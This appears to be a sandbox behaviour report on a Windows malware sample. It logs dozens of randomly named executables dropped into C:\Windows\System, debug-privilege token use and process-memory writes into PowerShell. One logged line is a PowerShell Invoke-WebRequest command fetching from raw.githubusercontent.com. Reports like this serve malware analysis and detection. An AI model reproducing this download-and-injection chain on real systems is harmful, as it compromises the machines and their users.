File created C:\Windows\System\kKhMwYw.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\opCWQUp.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XYAVEiv.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pOzKIdc.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BxuFTVc.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RpYOyvq.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GSqvfOe.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ejJQEsA.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\sQbbgkY.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KDcBRfI.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\QpQRckb.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vFSXsnK.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\HUBFYoY.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\LOrQPfH.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ejAPysh.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\fBcUARG.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xzNkeDA.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\IhiTfYZ.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nVKsjMr.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\hJyloET.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TZPzjov.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GPZEARg.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\BtxUqFl.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pGauIfj.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PtenfDp.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2236 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\QLNcKnJ.exe
PID 2236 wrote to memory of 2288 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\QLNcKnJ.exe
PID 2236 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\CVKMpwz.exe
PID 2236 wrote to memory of 1688 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\CVKMpwz.exe
PID 2236 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\tzreqhD.exe
PID 2236 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\tzreqhD.exe
PID 2236 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\yDdqgIA.exe
PID 2236 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\yDdqgIA.exe
PID 2236 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\SxGixoo.exe
PID 2236 wrote to memory of 4348 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\SxGixoo.exe
PID 2236 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\SPgeosr.exe
PID 2236 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\SPgeosr.exe
PID 2236 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\VZtQtyg.exe
PID 2236 wrote to memory of 3344 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\VZtQtyg.exe
PID 2236 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\gnmGXGG.exe
PID 2236 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\gnmGXGG.exe
PID 2236 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\ouiSHWw.exe
PID 2236 wrote to memory of 744 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\ouiSHWw.exe
PID 2236 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\XdLasvE.exe
PID 2236 wrote to memory of 4852 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\XdLasvE.exe
PID 2236 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\SdHsZCs.exe
PID 2236 wrote to memory of 664 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\SdHsZCs.exe
PID 2236 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\mfzmYQh.exe
PID 2236 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\mfzmYQh.exe
PID 2236 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\XXglGNM.exe
PID 2236 wrote to memory of 1092 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\XXglGNM.exe
PID 2236 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\QLiOhwv.exe
PID 2236 wrote to memory of 1072 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\QLiOhwv.exe
PID 2236 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\SOgxXDE.exe
PID 2236 wrote to memory of 3196 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\SOgxXDE.exe
PID 2236 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\NrqgsOy.exe
PID 2236 wrote to memory of 2124 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\NrqgsOy.exe
PID 2236 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\yKIliFL.exe
PID 2236 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\yKIliFL.exe
PID 2236 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\AeSuOMk.exe
PID 2236 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\AeSuOMk.exe
PID 2236 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\PHLzuHf.exe
PID 2236 wrote to memory of 3964 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\PHLzuHf.exe
PID 2236 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\vngnkni.exe
PID 2236 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\vngnkni.exe
PID 2236 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\MBGmdpk.exe
PID 2236 wrote to memory of 2224 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\MBGmdpk.exe
PID 2236 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\UmSEoJT.exe
PID 2236 wrote to memory of 1084 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\UmSEoJT.exe
PID 2236 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\EkeJagX.exe
PID 2236 wrote to memory of 2696 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\EkeJagX.exe
PID 2236 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\GPVODEt.exe
PID 2236 wrote to memory of 460 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\GPVODEt.exe
PID 2236 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\paILezr.exe
PID 2236 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\paILezr.exe
PID 2236 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\PgxEHLy.exe
PID 2236 wrote to memory of 2736 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\PgxEHLy.exe
PID 2236 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\TtGlCwY.exe
PID 2236 wrote to memory of 4468 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\TtGlCwY.exe
PID 2236 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\AhEUvLG.exe
PID 2236 wrote to memory of 4648 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\AhEUvLG.exe
PID 2236 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\QusIQhI.exe
PID 2236 wrote to memory of 4960 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\QusIQhI.exe
PID 2236 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\ZQWlwcv.exe
PID 2236 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\ZQWlwcv.exe
PID 2236 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\IQfhGhr.exe
PID 2236 wrote to memory of 4444 N/A C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe C:\Windows\System\IQfhGhr.exe

Processes

C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\QLNcKnJ.exe

C:\Windows\System\QLNcKnJ.exe

C:\Windows\System\CVKMpwz.exe

C:\Windows\System\CVKMpwz.exe

C:\Windows\System\tzreqhD.exe

C:\Windows\System\tzreqhD.exe

C:\Windows\System\yDdqgIA.exe

C:\Windows\System\yDdqgIA.exe

C:\Windows\System\SxGixoo.exe

C:\Windows\System\SxGixoo.exe

C:\Windows\System\SPgeosr.exe

C:\Windows\System\SPgeosr.exe

C:\Windows\System\VZtQtyg.exe

C:\Windows\System\VZtQtyg.exe

C:\Windows\System\gnmGXGG.exe

C:\Windows\System\gnmGXGG.exe

C:\Windows\System\ouiSHWw.exe

C:\Windows\System\ouiSHWw.exe

C:\Windows\System\XdLasvE.exe

C:\Windows\System\XdLasvE.exe

C:\Windows\System\SdHsZCs.exe

C:\Windows\System\SdHsZCs.exe

C:\Windows\System\mfzmYQh.exe

C:\Windows\System\mfzmYQh.exe

C:\Windows\System\XXglGNM.exe

C:\Windows\System\XXglGNM.exe

C:\Windows\System\QLiOhwv.exe

C:\Windows\System\QLiOhwv.exe

C:\Windows\System\SOgxXDE.exe

C:\Windows\System\SOgxXDE.exe

C:\Windows\System\NrqgsOy.exe

C:\Windows\System\NrqgsOy.exe

C:\Windows\System\yKIliFL.exe

C:\Windows\System\yKIliFL.exe

C:\Windows\System\AeSuOMk.exe

C:\Windows\System\AeSuOMk.exe

C:\Windows\System\PHLzuHf.exe

C:\Windows\System\PHLzuHf.exe

C:\Windows\System\vngnkni.exe

C:\Windows\System\vngnkni.exe

C:\Windows\System\MBGmdpk.exe

C:\Windows\System\MBGmdpk.exe

C:\Windows\System\UmSEoJT.exe

C:\Windows\System\UmSEoJT.exe

C:\Windows\System\EkeJagX.exe

C:\Windows\System\EkeJagX.exe

C:\Windows\System\GPVODEt.exe

C:\Windows\System\GPVODEt.exe

C:\Windows\System\paILezr.exe

C:\Windows\System\paILezr.exe

C:\Windows\System\PgxEHLy.exe

C:\Windows\System\PgxEHLy.exe

C:\Windows\System\TtGlCwY.exe

C:\Windows\System\TtGlCwY.exe

C:\Windows\System\AhEUvLG.exe

C:\Windows\System\AhEUvLG.exe

C:\Windows\System\QusIQhI.exe

C:\Windows\System\QusIQhI.exe

C:\Windows\System\ZQWlwcv.exe

C:\Windows\System\ZQWlwcv.exe

C:\Windows\System\IQfhGhr.exe

C:\Windows\System\IQfhGhr.exe

C:\Windows\System\NnMXJgV.exe

C:\Windows\System\NnMXJgV.exe

C:\Windows\System\mdnLpzP.exe

C:\Windows\System\mdnLpzP.exe

C:\Windows\System\CeSQuEM.exe

C:\Windows\System\CeSQuEM.exe

C:\Windows\System\TBszrIx.exe

C:\Windows\System\TBszrIx.exe

C:\Windows\System\hFirPgW.exe

C:\Windows\System\hFirPgW.exe

C:\Windows\System\majjVIy.exe

C:\Windows\System\majjVIy.exe

C:\Windows\System\CgyNqBj.exe

C:\Windows\System\CgyNqBj.exe

C:\Windows\System\BrydNGm.exe

C:\Windows\System\BrydNGm.exe

C:\Windows\System\jiIhIWM.exe

C:\Windows\System\jiIhIWM.exe

C:\Windows\System\CFLUWpe.exe

C:\Windows\System\CFLUWpe.exe

C:\Windows\System\OZuvJug.exe

C:\Windows\System\OZuvJug.exe

C:\Windows\System\YouiTpz.exe

C:\Windows\System\YouiTpz.exe

C:\Windows\System\EFFSXwq.exe

C:\Windows\System\EFFSXwq.exe

C:\Windows\System\qCzsVxt.exe

C:\Windows\System\qCzsVxt.exe

C:\Windows\System\qDrByaq.exe

C:\Windows\System\qDrByaq.exe

C:\Windows\System\zsGrXMg.exe

C:\Windows\System\zsGrXMg.exe

C:\Windows\System\BHjQPnu.exe

C:\Windows\System\BHjQPnu.exe

C:\Windows\System\veiTAaf.exe

C:\Windows\System\veiTAaf.exe

C:\Windows\System\jUYONQs.exe

C:\Windows\System\jUYONQs.exe

C:\Windows\System\VLbwReR.exe

C:\Windows\System\VLbwReR.exe

C:\Windows\System\aYuxTlf.exe

C:\Windows\System\aYuxTlf.exe

C:\Windows\System\zpAhaOs.exe

C:\Windows\System\zpAhaOs.exe

C:\Windows\System\LtolErA.exe

C:\Windows\System\LtolErA.exe

C:\Windows\System\ULQMsjT.exe

C:\Windows\System\ULQMsjT.exe

C:\Windows\System\XTYEdbe.exe

C:\Windows\System\XTYEdbe.exe

C:\Windows\System\wcgUGDW.exe

C:\Windows\System\wcgUGDW.exe

C:\Windows\System\YVQiNFr.exe

C:\Windows\System\YVQiNFr.exe

C:\Windows\System\iJNCoPp.exe

C:\Windows\System\iJNCoPp.exe

C:\Windows\System\sNJUfdD.exe

C:\Windows\System\sNJUfdD.exe

C:\Windows\System\panShYc.exe

C:\Windows\System\panShYc.exe

C:\Windows\System\zxPOkRw.exe

C:\Windows\System\zxPOkRw.exe

C:\Windows\System\oRNywOA.exe

C:\Windows\System\oRNywOA.exe

C:\Windows\System\zelktRs.exe

C:\Windows\System\zelktRs.exe

C:\Windows\System\vYfZPhm.exe

C:\Windows\System\vYfZPhm.exe

C:\Windows\System\kaqZHIQ.exe

C:\Windows\System\kaqZHIQ.exe

C:\Windows\System\jiNPIrq.exe

C:\Windows\System\jiNPIrq.exe

C:\Windows\System\qlcokiJ.exe

C:\Windows\System\qlcokiJ.exe

C:\Windows\System\EKbMofR.exe

C:\Windows\System\EKbMofR.exe

C:\Windows\System\pvizSVM.exe

C:\Windows\System\pvizSVM.exe

C:\Windows\System\HbPJBDP.exe

C:\Windows\System\HbPJBDP.exe

C:\Windows\System\aijlqjj.exe

C:\Windows\System\aijlqjj.exe

C:\Windows\System\rnnWgbC.exe

C:\Windows\System\rnnWgbC.exe

C:\Windows\System\hYnuIBz.exe

C:\Windows\System\hYnuIBz.exe

C:\Windows\System\LABuhfg.exe

C:\Windows\System\LABuhfg.exe

C:\Windows\System\FvDxfWy.exe

C:\Windows\System\FvDxfWy.exe

C:\Windows\System\KLZPdBU.exe

C:\Windows\System\KLZPdBU.exe

C:\Windows\System\xOGRNLH.exe

C:\Windows\System\xOGRNLH.exe

C:\Windows\System\ZqHSjNV.exe

C:\Windows\System\ZqHSjNV.exe

C:\Windows\System\oTlCHfa.exe

C:\Windows\System\oTlCHfa.exe

C:\Windows\System\aykDmLh.exe

C:\Windows\System\aykDmLh.exe

C:\Windows\System\SeUQhFh.exe

C:\Windows\System\SeUQhFh.exe

C:\Windows\System\asMDGPX.exe

C:\Windows\System\asMDGPX.exe

C:\Windows\System\qpzwtHr.exe

C:\Windows\System\qpzwtHr.exe

C:\Windows\System\kBTYUvT.exe

C:\Windows\System\kBTYUvT.exe

C:\Windows\System\SVKlgeA.exe

C:\Windows\System\SVKlgeA.exe

C:\Windows\System\XGEjZBw.exe

C:\Windows\System\XGEjZBw.exe

C:\Windows\System\rpDxAJh.exe

C:\Windows\System\rpDxAJh.exe

C:\Windows\System\xcIcKIL.exe

C:\Windows\System\xcIcKIL.exe

C:\Windows\System\RkLqqCt.exe

C:\Windows\System\RkLqqCt.exe

C:\Windows\System\MVFIYWY.exe

C:\Windows\System\MVFIYWY.exe

C:\Windows\System\gAMgRaR.exe

C:\Windows\System\gAMgRaR.exe

C:\Windows\System\yClygdE.exe

C:\Windows\System\yClygdE.exe

C:\Windows\System\Dvppkns.exe

C:\Windows\System\Dvppkns.exe

C:\Windows\System\QkhTNCN.exe

C:\Windows\System\QkhTNCN.exe

C:\Windows\System\KKaYMdI.exe

C:\Windows\System\KKaYMdI.exe

C:\Windows\System\nqkDOSE.exe

C:\Windows\System\nqkDOSE.exe

C:\Windows\System\QYqlMTH.exe

C:\Windows\System\QYqlMTH.exe

C:\Windows\System\pCuwtkt.exe

C:\Windows\System\pCuwtkt.exe

C:\Windows\System\bjblmzo.exe

C:\Windows\System\bjblmzo.exe

C:\Windows\System\WzjrOvx.exe

C:\Windows\System\WzjrOvx.exe

C:\Windows\System\OMDIjDo.exe

C:\Windows\System\OMDIjDo.exe

C:\Windows\System\bMRfWuz.exe

C:\Windows\System\bMRfWuz.exe

C:\Windows\System\BCRgbhj.exe

C:\Windows\System\BCRgbhj.exe

C:\Windows\System\JkNhIla.exe

C:\Windows\System\JkNhIla.exe

C:\Windows\System\igxdcvm.exe

C:\Windows\System\igxdcvm.exe

C:\Windows\System\LOixJeC.exe

C:\Windows\System\LOixJeC.exe

C:\Windows\System\cWjunex.exe

C:\Windows\System\cWjunex.exe

C:\Windows\System\dPndhMG.exe

C:\Windows\System\dPndhMG.exe

C:\Windows\System\ossNbrI.exe

C:\Windows\System\ossNbrI.exe

C:\Windows\System\BdcfTmU.exe

C:\Windows\System\BdcfTmU.exe

C:\Windows\System\GnUYoEm.exe

C:\Windows\System\GnUYoEm.exe

C:\Windows\System\limzYZh.exe

C:\Windows\System\limzYZh.exe

C:\Windows\System\smdfMTe.exe

C:\Windows\System\smdfMTe.exe

C:\Windows\System\bSzoiBu.exe

C:\Windows\System\bSzoiBu.exe

C:\Windows\System\XPoFDSk.exe

C:\Windows\System\XPoFDSk.exe

C:\Windows\System\gIQdQUq.exe

C:\Windows\System\gIQdQUq.exe

C:\Windows\System\DsjNcRG.exe

C:\Windows\System\DsjNcRG.exe

C:\Windows\System\PcuPhIR.exe

C:\Windows\System\PcuPhIR.exe

C:\Windows\System\wmGrqyc.exe

C:\Windows\System\wmGrqyc.exe

C:\Windows\System\VghPLIn.exe

C:\Windows\System\VghPLIn.exe

C:\Windows\System\zFRxGAK.exe

C:\Windows\System\zFRxGAK.exe

C:\Windows\System\ctyXlVo.exe

C:\Windows\System\ctyXlVo.exe

C:\Windows\System\xLKtPrg.exe

C:\Windows\System\xLKtPrg.exe

C:\Windows\System\bHBoaft.exe

C:\Windows\System\bHBoaft.exe

C:\Windows\System\yCkPlDw.exe

C:\Windows\System\yCkPlDw.exe

C:\Windows\System\GlKLDxi.exe

C:\Windows\System\GlKLDxi.exe

C:\Windows\System\OEKYvmN.exe

C:\Windows\System\OEKYvmN.exe

C:\Windows\System\reOEjeL.exe

C:\Windows\System\reOEjeL.exe

C:\Windows\System\edSdaus.exe

C:\Windows\System\edSdaus.exe

C:\Windows\System\xMPgCla.exe

C:\Windows\System\xMPgCla.exe

C:\Windows\System\bTwZmfa.exe

C:\Windows\System\bTwZmfa.exe

C:\Windows\System\JlxVgWj.exe

C:\Windows\System\JlxVgWj.exe

C:\Windows\System\czSBWcc.exe

C:\Windows\System\czSBWcc.exe

C:\Windows\System\xaXbveB.exe

C:\Windows\System\xaXbveB.exe

C:\Windows\System\gmkoqga.exe

C:\Windows\System\gmkoqga.exe

C:\Windows\System\QZuwILT.exe

C:\Windows\System\QZuwILT.exe

C:\Windows\System\KDcBRfI.exe

C:\Windows\System\KDcBRfI.exe

C:\Windows\System\biasJgO.exe

C:\Windows\System\biasJgO.exe

C:\Windows\System\KPWKwrz.exe

C:\Windows\System\KPWKwrz.exe

C:\Windows\System\hORwief.exe

C:\Windows\System\hORwief.exe

C:\Windows\System\ndgpMEW.exe

C:\Windows\System\ndgpMEW.exe

C:\Windows\System\WPMZjMO.exe

C:\Windows\System\WPMZjMO.exe

C:\Windows\System\nmfzvJh.exe

C:\Windows\System\nmfzvJh.exe

C:\Windows\System\OXfWFUv.exe

C:\Windows\System\OXfWFUv.exe

C:\Windows\System\bmlRhKQ.exe

C:\Windows\System\bmlRhKQ.exe

C:\Windows\System\cwVWkAt.exe

C:\Windows\System\cwVWkAt.exe

C:\Windows\System\dFwLdFn.exe

C:\Windows\System\dFwLdFn.exe

C:\Windows\System\nvRGAdk.exe

C:\Windows\System\nvRGAdk.exe

C:\Windows\System\uoAzslS.exe

C:\Windows\System\uoAzslS.exe

C:\Windows\System\rBQHHVo.exe

C:\Windows\System\rBQHHVo.exe

C:\Windows\System\vOVBtao.exe

C:\Windows\System\vOVBtao.exe

C:\Windows\System\jKXjxNi.exe

C:\Windows\System\jKXjxNi.exe

C:\Windows\System\efyUZFr.exe

C:\Windows\System\efyUZFr.exe

C:\Windows\System\QYdHLQv.exe

C:\Windows\System\QYdHLQv.exe

C:\Windows\System\GRHGLQo.exe

C:\Windows\System\GRHGLQo.exe

C:\Windows\System\ckqBKiS.exe

C:\Windows\System\ckqBKiS.exe

C:\Windows\System\bKqzyli.exe

C:\Windows\System\bKqzyli.exe

C:\Windows\System\YcEuTOK.exe

C:\Windows\System\YcEuTOK.exe

C:\Windows\System\CUxmVpZ.exe

C:\Windows\System\CUxmVpZ.exe

C:\Windows\System\ioDYaxi.exe

C:\Windows\System\ioDYaxi.exe

C:\Windows\System\qdnZHHf.exe

C:\Windows\System\qdnZHHf.exe

C:\Windows\System\uaosUpH.exe

C:\Windows\System\uaosUpH.exe

C:\Windows\System\jqzQZVh.exe

C:\Windows\System\jqzQZVh.exe

C:\Windows\System\MCiywPH.exe

C:\Windows\System\MCiywPH.exe

C:\Windows\System\gwmdPEN.exe

C:\Windows\System\gwmdPEN.exe

C:\Windows\System\mRGaqYj.exe

C:\Windows\System\mRGaqYj.exe

C:\Windows\System\jwCycgX.exe

C:\Windows\System\jwCycgX.exe

C:\Windows\System\exdTCEd.exe

C:\Windows\System\exdTCEd.exe

C:\Windows\System\hhQCbmy.exe

C:\Windows\System\hhQCbmy.exe

